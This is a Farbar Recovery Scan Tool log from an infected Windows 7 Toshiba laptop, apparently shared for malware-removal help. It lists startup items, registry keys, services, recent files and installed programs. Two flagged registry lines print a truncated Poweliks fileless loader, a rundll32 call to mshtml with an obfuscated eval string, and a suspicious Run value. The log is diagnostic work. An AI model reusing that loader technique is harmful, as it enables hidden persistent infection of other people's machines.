(TOSHIBA Corporation) C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe
(Microsoft Corporation) C:\Program Files\Microsoft IntelliPoint\ipoint.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(CANON INC.) C:\Program Files\Canon\MyPrinter\BJMYPRT.EXE
(TeamViewer GmbH) C:\Program Files\TeamViewer\Version6\TeamViewer.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Advanced Micro Devices Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Adobe Systems Incorporated) C:\Program Files\Adobe\Reader 9.0\Reader\reader_sl.exe
(ATI Technologies Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(TOSHIBA CORPORATION) C:\Program Files\TOSHIBA\ConfigFree\NDSTray.exe
(TOSHIBA CORPORATION) C:\Program Files\TOSHIBA\ConfigFree\CFSwMgr.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Management Engine Components\UNS\UNS.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [StartCCC] => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2010-03-16] (Advanced Micro Devices, Inc.)
HKLM\...\Run: [cAudioFilterAgent] => C:\Program Files\Conexant\cAudioFilterAgent\cAudioFilterAgent.exe [496184 2010-03-23] (Conexant Systems, Inc.)
HKLM\...\Run: [TPwrMain] => C:\Program Files\TOSHIBA\Power Saver\TPwrMain.EXE [480608 2009-11-06] (TOSHIBA Corporation)
HKLM\...\Run: [00TCrdMain] => C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe [742712 2010-03-04] (TOSHIBA Corporation)
HKLM\...\Run: [TWebCamera] => C:\Program Files\TOSHIBA\TOSHIBA Web Camera Application\TWebCamera.exe [2454840 2010-02-24] (TOSHIBA CORPORATION.)
HKLM\...\Run: [IntelliPoint] => c:\Program Files\Microsoft IntelliPoint\ipoint.exe [1797008 2010-07-21] (Microsoft Corporation)
HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2010-11-29] (Apple Inc.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [421160 2010-12-13] (Apple Inc.)
HKLM\...\Run: [CanonMyPrinter] => C:\Program Files\Canon\MyPrinter\BJMyPrt.exe [2508104 2009-11-02] (CANON INC.)
HKLM\...\Run: [CanonSolutionMenu] => C:\Program Files\Canon\SolutionMenu\CNSLMAIN.exe [767312 2009-09-04] (CANON INC.)
HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [284440 2011-10-17] (Intel Corporation)
HKLM\...\Run: [ToshibaServiceStation] => C:\Program Files\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe [1295736 2011-02-11] (TOSHIBA Corporation)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [974432 2014-08-22] (Microsoft Corporation)
HKLM\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe [41056 2013-05-09] (Adobe Systems Incorporated)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [958576 2013-04-04] (Adobe Systems Incorporated)
HKU\S-1-5-21-931387415-1679961563-2565028958-1004\...\Run: [.tluafed** <*>] => C:\Users\hesperia\Application Data\{00006159-2247-321A-78CD-B6B14BD17071}.ex <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-931387415-1679961563-2565028958-1004\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com.au/
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/
SearchScopes: HKCU - {F4ED0519-C584-4DDA-BE93-FA0B93D040F6} URL = 
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files\Canon\Easy-WebPrint EX\ewpexbho.dll (CANON INC.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
BHO: TOSHIBA Media Controller Plug-in -> {F3C88694-EFFA-4d78-B409-54B7B2535B14} -> C:\Program Files\TOSHIBA\TOSHIBA Media Controller Plug-in\TOSHIBAMediaControllerIE.dll (<TOSHIBA>)
BHO: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus32.dll (Adblock Plus)
Toolbar: HKLM - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll (CANON INC.)
Toolbar: HKCU - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll (CANON INC.)
Handler: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll (Microsoft Corporation)
Handler: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll (Microsoft Corporation)
Winsock: Catalog5 09 C:\Program Files\Bonjour\mdnsNSP.dll [152864] (Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
 
FireFox:
========
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @canon.com/EPPEX -> C:\Program Files\Canon\Easy-PhotoPrint EX\NPEZFFPI.DLL (CANON INC.)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MIF5BA~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MIF5BA~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=14.0.8117.0416 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 9.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
 
Chrome: 
=======
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 AgereModemAudio; C:\Program Files\LSI SoftModem\agrsmsvc.exe [14336 2009-03-28] (LSI Corporation)
S3 cfWiMAXService; C:\Program Files\TOSHIBA\ConfigFree\CFIWmxSvcs.exe [185712 2010-01-29] (TOSHIBA CORPORATION)
S3 ConfigFree Service; C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe [46448 2009-03-11] (TOSHIBA CORPORATION)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [22192 2014-08-22] (Microsoft Corporation)
S3 MSSQL$MSSMLBIZ; c:\Program Files\Microsoft SQL Server\MSSQL.2\MSSQL\Binn\sqlservr.exe [29293408 2010-12-10] (Microsoft Corporation)
S4 MSSQLServerADHelper; c:\Program Files\Microsoft SQL Server\90\Shared\sqladhlp90.exe [44384 2010-12-10] (Microsoft Corporation)
S3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [288120 2014-08-22] (Microsoft Corporation)
R3 TMachInfo; C:\Program Files\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe [54136 2011-02-11] (TOSHIBA Corporation)
R2 TOSHIBA eco Utility Service; C:\Program Files\TOSHIBA\TECO\TecoService.exe [189808 2010-03-17] (TOSHIBA Corporation)
S3 TOSHIBA HDD SSD Alert Service; C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe [111960 2010-02-06] (TOSHIBA Corporation)
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 amdkmdag; C:\windows\System32\DRIVERS\atipmdag.sys [5340160 2010-03-15] (ATI Technologies Inc.)
R3 CnxtHdmiAudService; C:\windows\System32\drivers\CHDMI32.sys [516152 2010-03-06] (Conexant Systems Inc.)
R0 MpFilter; C:\windows\System32\DRIVERS\MpFilter.sys [231800 2014-07-17] (Microsoft Corporation)
R3 PGEffect; C:\windows\System32\DRIVERS\pgeffect.sys [24064 2009-06-23] (TOSHIBA Corporation)
 
==================== NetSvcs (Whitelisted) ===================
 
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-09-12 09:46 - 2014-09-12 09:46 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2014-09-10 18:08 - 2014-09-05 09:42 - 00444416 _____ (Microsoft Corporation) C:\windows\system32\aepdu.dll
2014-09-10 18:08 - 2014-09-05 09:38 - 00303104 _____ (Microsoft Corporation) C:\windows\system32\aeinv.dll
2014-09-10 17:34 - 2014-09-10 17:35 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader 9.lnk
2014-09-10 17:34 - 2014-09-10 17:35 - 00001955 _____ () C:\Users\Public\Desktop\Adobe Reader 9.lnk
2014-09-10 17:34 - 2014-09-10 17:34 - 00000000 ____D () C:\Program Files\Adobe
2014-09-10 03:01 - 2014-09-10 03:01 - 00000000 ____D () C:\windows\system32\SPReview
2014-09-09 15:25 - 2014-09-10 17:39 - 00043055 _____ () C:\Users\hesperia\Downloads\Addition.txt
2014-09-09 15:24 - 2014-09-12 15:12 - 00000000 ____D () C:\FRST
2014-09-09 15:24 - 2014-09-10 17:39 - 00022724 _____ () C:\Users\hesperia\Downloads\FRST.txt
2014-09-09 15:23 - 2014-09-09 15:23 - 01097728 _____ (Farbar) C:\Users\hesperia\Downloads\FRST.exe
2014-09-09 15:12 - 2014-09-09 15:15 - 05185536 _____ (AVAST Software) C:\Users\hesperia\Downloads\aswmbr.exe
2014-09-09 14:47 - 2014-09-09 14:47 - 00001103 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer 6.lnk
2014-09-09 14:47 - 2014-09-09 14:47 - 00001091 _____ () C:\Users\Public\Desktop\TeamViewer 6.lnk
2014-09-09 14:47 - 2014-09-09 14:47 - 00000000 ____D () C:\Program Files\TeamViewer
2014-09-09 14:44 - 2014-09-09 14:44 - 00000000 ____D () C:\Program Files\Adblock Plus for IE
2014-09-09 14:41 - 2014-09-12 13:10 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-09-09 14:41 - 2014-09-09 14:41 - 00113880 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\48230029.sys
2014-09-09 14:41 - 2014-09-09 14:41 - 00001031 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-09-09 14:41 - 2014-09-09 14:41 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-09 14:40 - 2014-09-12 13:10 - 00000000 ____D () C:\Users\hesperia\Desktop\mbar
2014-09-09 14:40 - 2014-09-12 12:59 - 00075480 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbamchameleon.sys
2014-09-09 14:40 - 2014-09-09 14:40 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-09-09 14:40 - 2014-05-12 07:26 - 00051928 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mwac.sys
2014-09-09 14:33 - 2014-09-09 15:11 - 00000000 ____D () C:\Users\hesperia\Downloads\backups
2014-09-09 14:30 - 2014-09-09 14:35 - 00000000 ____D () C:\AdwCleaner
2014-09-09 14:28 - 2014-09-12 12:58 - 00000000 ____D () C:\windows\ERUNT
2014-09-09 14:24 - 2014-09-09 14:24 - 00388608 _____ (Trend Micro Inc.) C:\Users\hesperia\Downloads\HijackThis.exe
2014-09-08 18:32 - 2014-09-08 18:33 - 00232208 _____ () C:\windows\Minidump\090814-36613-01.dmp
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-09-12 15:12 - 2014-09-09 15:24 - 00000000 ____D () C:\FRST
2014-09-12 15:10 - 2010-12-29 12:16 - 00265897 _____ () C:\Users\hesperia\Documents\Invites.eml
2014-09-12 15:10 - 2009-07-14 12:53 - 00000006 ____H () C:\windows\Tasks\SA.DAT
2014-09-12 15:10 - 2009-07-14 12:39 - 00144435 _____ () C:\windows\setupact.log
2014-09-12 13:41 - 2010-12-19 11:01 - 00685982 _____ () C:\windows\PFRO.log
2014-09-12 13:41 - 2010-11-03 08:45 - 01777622 _____ () C:\windows\WindowsUpdate.log
2014-09-12 13:40 - 2013-04-27 13:08 - 00000830 _____ () C:\windows\Tasks\Adobe Flash Player Updater.job
2014-09-12 13:10 - 2014-09-09 14:41 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-09-12 13:10 - 2014-09-09 14:40 - 00000000 ____D () C:\Users\hesperia\Desktop\mbar
2014-09-12 13:06 - 2009-07-14 12:34 - 00016080 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-09-12 13:06 - 2009-07-14 12:34 - 00016080 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-09-12 12:59 - 2014-09-09 14:40 - 00075480 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbamchameleon.sys
2014-09-12 12:59 - 2011-04-29 10:03 - 00113880 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbamswissarmy.sys
2014-09-12 12:58 - 2014-09-09 14:28 - 00000000 ____D () C:\windows\ERUNT
2014-09-12 09:49 - 2011-02-23 10:13 - 00000000 ____D () C:\Users\hesperia\AppData\Local\CrashDumps
2014-09-12 09:46 - 2014-09-12 09:46 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2014-09-10 19:41 - 2014-07-10 08:52 - 00000000 ___SD () C:\windows\system32\CompatTel
2014-09-10 19:41 - 2012-05-01 22:36 - 00002088 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Security Essentials.lnk
2014-09-10 19:41 - 2012-04-24 14:31 - 00001945 _____ () C:\windows\epplauncher.mif
2014-09-10 19:41 - 2012-04-24 14:30 - 00000000 ____D () C:\Program Files\Microsoft Security Client
2014-09-10 19:41 - 2010-11-03 09:24 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-09-10 19:12 - 2010-11-03 09:27 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office
2014-09-10 17:39 - 2014-09-09 15:25 - 00043055 _____ () C:\Users\hesperia\Downloads\Addition.txt
2014-09-10 17:39 - 2014-09-09 15:24 - 00022724 _____ () C:\Users\hesperia\Downloads\FRST.txt
2014-09-10 17:35 - 2014-09-10 17:34 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader 9.lnk
2014-09-10 17:35 - 2014-09-10 17:34 - 00001955 _____ () C:\Users\Public\Desktop\Adobe Reader 9.lnk
2014-09-10 17:34 - 2014-09-10 17:34 - 00000000 ____D () C:\Program Files\Adobe
2014-09-10 17:34 - 2011-04-29 10:16 - 00000000 ____D () C:\Program Files\Common Files\Adobe
2014-09-10 17:34 - 2010-07-07 10:08 - 00000000 ____D () C:\ProgramData\Adobe
2014-09-10 17:33 - 2010-12-31 22:20 - 00000000 ____D () C:\Users\hesperia\AppData\Local\Adobe
2014-09-10 03:01 - 2014-09-10 03:01 - 00000000 ____D () C:\windows\system32\SPReview
2014-09-09 15:23 - 2014-09-09 15:23 - 01097728 _____ (Farbar) C:\Users\hesperia\Downloads\FRST.exe
2014-09-09 15:15 - 2014-09-09 15:12 - 05185536 _____ (AVAST Software) C:\Users\hesperia\Downloads\aswmbr.exe
2014-09-09 15:11 - 2014-09-09 14:33 - 00000000 ____D () C:\Users\hesperia\Downloads\backups
2014-09-09 14:47 - 2014-09-09 14:47 - 00001103 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer 6.lnk
2014-09-09 14:47 - 2014-09-09 14:47 - 00001091 _____ () C:\Users\Public\Desktop\TeamViewer 6.lnk
2014-09-09 14:47 - 2014-09-09 14:47 - 00000000 ____D () C:\Program Files\TeamViewer
2014-09-09 14:44 - 2014-09-09 14:44 - 00000000 ____D () C:\Program Files\Adblock Plus for IE
2014-09-09 14:41 - 2014-09-09 14:41 - 00113880 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\48230029.sys
2014-09-09 14:41 - 2014-09-09 14:41 - 00001031 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-09-09 14:41 - 2014-09-09 14:41 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-09 14:40 - 2014-09-09 14:40 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-09-09 14:40 - 2011-04-29 10:03 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-09-09 14:35 - 2014-09-09 14:30 - 00000000 ____D () C:\AdwCleaner
2014-09-09 14:24 - 2014-09-09 14:24 - 00388608 _____ (Trend Micro Inc.) C:\Users\hesperia\Downloads\HijackThis.exe
2014-09-08 18:33 - 2014-09-08 18:32 - 00232208 _____ () C:\windows\Minidump\090814-36613-01.dmp
2014-09-08 18:32 - 2011-09-21 14:51 - 405289750 _____ () C:\windows\MEMORY.DMP
2014-09-08 18:32 - 2011-04-29 09:59 - 00000000 ____D () C:\windows\Minidump
2014-09-07 10:07 - 2009-07-14 10:37 - 00000000 ____D () C:\windows\system32\NDF
2014-09-07 09:40 - 2010-12-21 13:59 - 00000000 ____D () C:\Users\hesperia\AppData\Local\Apple Computer
2014-09-07 09:40 - 2010-11-03 09:33 - 00000000 ____D () C:\ProgramData\Skype
2014-09-07 09:40 - 2010-11-03 09:02 - 00000000 ____D () C:\ProgramData\Norton
2014-09-05 09:42 - 2014-09-10 18:08 - 00444416 _____ (Microsoft Corporation) C:\windows\system32\aepdu.dll
2014-09-05 09:38 - 2014-09-10 18:08 - 00303104 _____ (Microsoft Corporation) C:\windows\system32\aeinv.dll
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\windows\explorer.exe => File is digitally signed
C:\windows\system32\winlogon.exe => File is digitally signed
C:\windows\system32\wininit.exe => File is digitally signed
C:\windows\system32\svchost.exe => File is digitally signed
C:\windows\system32\services.exe => File is digitally signed
C:\windows\system32\User32.dll => File is digitally signed
C:\windows\system32\userinit.exe => File is digitally signed
C:\windows\system32\rpcss.dll => File is digitally signed
C:\windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-09-06 10:25
 
==================== End Of Log ============================
 
 
Additional scan result of Farbar Recovery Scan Tool (x86) Version: 10-09-2014
Ran by hesperia at 2014-09-12 15:13:42
Running from E:\
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Microsoft Security Essentials (Disabled - Up to date) {4F35CFC4-45A3-FC37-EF17-759A02E39AB1}
AS: Microsoft Security Essentials (Disabled - Up to date) {F4542E20-6399-F3B9-D5A7-4EE87964D00C}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
Adblock Plus for IE (32-bit) (HKLM\...\{DF0E7912-4A45-4B24-B472-E521C4D2C663}) (Version: 99.9 - Eyeo GmbH)
Adobe Flash Player 11 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 11.7.700.169 - Adobe Systems Incorporated)
Adobe Reader 9.5.5 (HKLM\...\{AC76BA86-7AD7-1033-7B44-A95000000001}) (Version: 9.5.5 - Adobe Systems Incorporated)
Apple Application Support (HKLM\...\{EE6097DD-05F4-4178-9719-D3170BF098E8}) (Version: 1.4.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{308B6AEA-DE50-4666-996D-0FA461719D6B}) (Version: 3.3.0.69 - Apple Inc.)
Apple Software Update (HKLM\...\{C41300B9-185D-475E-BFEC-39EF732F19B1}) (Version: 2.1.2.120 - Apple Inc.)
Atheros Communications Inc.® AR81Family Gigabit/Fast Ethernet Driver (HKLM\...\{3108C217-BE83-42E4-AE9E-A56A2A92E549}) (Version: 1.0.0.26 - Atheros Communications Inc.)
ATI Catalyst Install Manager (HKLM\...\{607CAF58-360F-8AB2-0E15-8B71B86E2390}) (Version: 3.0.765.0 - ATI Technologies, Inc.)
Bluetooth Stack for Windows by Toshiba (HKLM\...\{CEBB6BFB-D708-4F99-A633-BC2600E01EF6}) (Version: v7.10.10(T) - TOSHIBA CORPORATION)
Bonjour (HKLM\...\{2A981294-F14C-4F0F-9627-D793270922F8}) (Version: 2.0.4.0 - Apple Inc.)
Broadcom 802.11 Network Adapter (HKLM\...\Broadcom 802.11 Network Adapter) (Version: 5.60.48.35 - Broadcom Corporation)
BurnInTest v5.3 Pro (HKLM\...\BurnInTest_is1) (Version: 5.3 - Passmark Software)
Business Contact Manager for Outlook 2007 SP2 (HKLM\...\Business Contact Manager) (Version: 3.0.8619.1 - Microsoft Corporation)
Business Contact Manager for Outlook 2007 SP2 (Version: 3.0.8619.1 - Microsoft Corporation) Hidden
Canon Easy-WebPrint EX (HKLM\...\Easy-WebPrint EX) (Version:  - )
Canon MP Navigator EX 3.1 (HKLM\...\MP Navigator EX 3.1) (Version:  - )
Canon MX870 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MX870_series) (Version:  - )
Canon Speed Dial Utility (HKLM\...\Speed Dial Utility) (Version:  - )
Canon Utilities Easy-PhotoPrint EX (HKLM\...\Easy-PhotoPrint EX) (Version:  - )
Canon Utilities My Printer (HKLM\...\CanonMyPrinter) (Version:  - )
Canon Utilities Solution Menu (HKLM\...\CanonSolutionMenu) (Version:  - )
Catalyst Control Center - Branding (Version: 1.00.0000 - ATI) Hidden
Catalyst Control Center Core Implementation (Version: 2010.0315.1050.17562 - ATI) Hidden
Catalyst Control Center Graphics Full Existing (Version: 2010.0315.1050.17562 - ATI) Hidden
Catalyst Control Center Graphics Full New (Version: 2010.0315.1050.17562 - ATI) Hidden
Catalyst Control Center Graphics Light (Version: 2010.0315.1050.17562 - ATI) Hidden
Catalyst Control Center Graphics Previews Common (Version: 2010.0315.1050.17562 - ATI) Hidden
Catalyst Control Center Graphics Previews Vista (Version: 2010.0315.1050.17562 - ATI) Hidden
Catalyst Control Center InstallProxy (Version: 2010.0315.1050.17562 - ATI Technologies, Inc.) Hidden
Catalyst Control Center Localization All (Version: 2010.0315.1050.17562 - ATI) Hidden
CCC Help Chinese Standard (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Chinese Traditional (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Czech (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Danish (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Dutch (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help English (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Finnish (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help French (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help German (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Greek (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Hungarian (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Italian (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Japanese (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Korean (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Norwegian (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Polish (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Portuguese (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Russian (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Spanish (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Swedish (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Thai (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Turkish (Version: 2010.0315.1049.17562 - ATI) Hidden
ccc-core-static (Version: 2010.0315.1050.17562 - ATI) Hidden
ccc-utility (Version: 2010.0315.1050.17562 - ATI) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 3.05 - Piriform)
Cisco EAP-FAST Module (HKLM\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM\...\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM\...\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.)
Conexant Audio Driver For AMD HDMI Codec (HKLM\...\CNXT_AUDIO_HDA_HDMI) (Version: 4.98.26.0 - Conexant)
Conexant HD Audio (HKLM\...\CNXT_AUDIO_HDA) (Version: 4.119.0.61 - Conexant)
Corel WinDVD (HKLM\...\{5C1F18D2-F6B7-4242-B803-B5A78648185D}) (Version: 10.0.5.822 - Corel Inc.)
Definition Update for Microsoft Office 2010 (KB982726) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{650DE870-ECA3-4E63-8D77-778512BE5D4C}) (Version:  - Microsoft)
Intel® Management Engine Components (HKLM\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 6.0.0.1179 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 10.8.0.1003 - Intel Corporation)
Intel® Turbo Boost Technology Driver (HKLM\...\{D6C630BF-8DBB-4042-8562-DC9A52CB6E7E}) (Version: 01.01.01.1007 - Intel Corporation)
iTunes (HKLM\...\{881F5DE8-9367-4B81-A325-E91BBC6472F9}) (Version: 10.1.1.4 - Apple Inc.)
Java™ 6 Update 17 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83216017FF}) (Version: 6.0.170 - Sun Microsystems, Inc.)
Junk Mail filter update (Version: 14.0.8117.416 - Microsoft Corporation) Hidden
LSI V92 MOH Application (HKLM\...\LTMOH) (Version:  - LSI Corporation)
Malwarebytes' Anti-Malware (HKLM\...\Malwarebytes' Anti-Malware_is1) (Version:  - Malwarebytes Corporation)
Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)
Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Client Profile (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft Application Error Reporting (Version: 12.0.6012.5000 - Microsoft Corporation) Hidden
Microsoft Choice Guard (Version: 2.0.48.0 - Microsoft Corporation) Hidden
Microsoft IntelliPoint 8.0 (HKLM\...\{00F93853-D9D3-4795-A89E-84CCBA0205C9}) (Version: 8.0.225.0 - Microsoft)
Microsoft Office 2003 Web Components (HKLM\...\{90A40409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.8173.0 - Microsoft Corporation)
Microsoft Office 2007 Primary Interop Assemblies (HKLM\...\{50120000-1105-0000-0000-0000000FF1CE}) (Version: 12.0.4518.1014 - Microsoft Corporation)
